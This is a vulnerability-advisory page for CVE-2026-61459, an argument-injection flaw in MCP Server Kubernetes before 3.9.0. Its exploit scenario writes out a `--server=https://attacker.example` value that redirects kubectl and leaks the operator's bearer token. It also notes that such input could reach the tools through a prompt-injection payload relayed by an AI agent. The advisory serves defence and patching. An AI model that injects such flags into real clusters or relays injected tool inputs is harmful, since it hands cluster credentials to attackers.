Skip to main content

MCP Server Kubernetes CVE-2026-61459

| EUVDEUVD-2026-42987 CRITICAL
Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') (CWE-88)
2026-07-10 VulnCheck GHSA-wmg3-h8mf-wgvr
9.3
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
9.3 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
9.8 CRITICAL

Network-reachable tool inputs with no privileges or interaction (PR:N/UI:N per vendor vector); stolen operator token yields high C/I/A over the cluster; scope kept unchanged to align with the 4.0 SC:N mapping.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

2
Analysis Generated
Jul 10, 2026 - 19:22 vuln.today
CVE Published
Jul 10, 2026 - 18:34 cve.org
CRITICAL 9.3

DescriptionCVE.org

MCP Server Kubernetes before 3.9.0 contains an argument injection vulnerability in structured tools (kubectl_get, kubectl_describe, kubectl_delete) that allows attackers to bypass the assertNoDangerousFlags security check by supplying resourceType and name parameters with leading dashes. Attackers can inject the --server flag to redirect kubectl commands to an attacker-controlled API server, causing the operator's bearer token to be transmitted externally and enabling full cluster compromise.

AnalysisAI

Argument injection in Flux159 MCP Server Kubernetes before 3.9.0 lets remote attackers redirect kubectl operations to an attacker-controlled API server by smuggling a leading-dash --server flag through the resourceType and name parameters of the kubectl_get, kubectl_describe, and kubectl_delete structured tools. Because the injected values bypass the assertNoDangerousFlags check, the operator's bearer token is transmitted to the external server, enabling full Kubernetes cluster compromise. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach MCP tool interface
Delivery
Submit name/resourceType with leading dash
Exploit
Inject --server flag into kubectl
Execution
kubectl connects to attacker API server
Persist
Operator bearer token exfiltrated
Impact
Reuse token for full cluster compromise

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to supply the resourceType or name parameter to one of the vulnerable structured tools (kubectl_get, kubectl_describe, or kubectl_delete) in a version before 3.9.0, with the value crafted to begin with a leading dash so it is parsed by kubectl as the `--server` flag; the MCP server must be configured with usable Kubernetes credentials (bearer token/kubeconfig) that get attached to the redirected request. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The signals are largely consistent and point to genuine high priority. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who can influence the MCP tool inputs - for example via a prompt-injection payload the AI agent relays, or a directly exposed MCP endpoint - calls kubectl_get with a name or resourceType of `--server=https://attacker.example`. The vulnerable server passes this to kubectl, which sends the request (and the operator's bearer token) to the attacker's rogue API server; publicly available exploit code demonstrates the technique. …
Remediation Vendor-released patch: upgrade MCP Server Kubernetes to version 3.9.0 or later (https://github.com/Flux159/mcp-server-kubernetes/releases/tag/3.9.0), which corresponds to PR #329 and commit d7890f50a4567bf5d9842541ba6f41e180227f9a that hardens the argument handling. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: identify all systems running Flux159 MCP Server Kubernetes versions prior to 3.9.0 and assess network exposure; isolate or disable affected services if immediate patching is not possible. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2025-1974 CRITICAL POC
9.8 Mar 25

A critical vulnerability in Kubernetes ingress-nginx controller allows unauthenticated attackers with pod network access

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2025-1098 HIGH POC
8.8 Mar 25

Kubernetes ingress-nginx contains a configuration injection vulnerability via the mirror-target and mirror-host Ingress

CVE-2025-24514 HIGH POC
8.8 Mar 25

A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingres

CVE-2025-1097 HIGH POC
8.8 Mar 25

A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-tls-match-c

CVE-2020-8554 MEDIUM POC
6.3 Jan 21

Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.exter

CVE-2025-55190 CRITICAL POC
9.9 Sep 04

Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Rated critical severity (CVSS 9.9), this vulne

CVE-2018-18843 CRITICAL POC
10.0 Dec 04

The Kubernetes integration in GitLab Enterprise Edition 11.x before 11.2.8, 11.3.x before 11.3.9, and 11.4.x before 11.4

CVE-2026-22039 CRITICAL POC
9.9 Jan 27

Kyverno Kubernetes policy engine prior to 1.x has a privilege escalation vulnerability (CVSS 9.9) allowing policy bypass

CVE-2024-42480 CRITICAL POC
9.9 Aug 12

Kamaji is the Hosted Control Plane Manager for Kubernetes. Rated critical severity (CVSS 9.9), this vulnerability is rem

CVE-2023-28110 CRITICAL POC
9.9 Mar 16

Jumpserver is a popular open source bastion host, and Koko is a Jumpserver component that is the Go version of coco, ref

CVE-2026-25996 CRITICAL POC
9.8 Feb 12

String filter bypass in Inspektor Gadget Kubernetes eBPF tooling before fix. Insufficient string escaping enables filter

Share

CVE-2026-61459 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy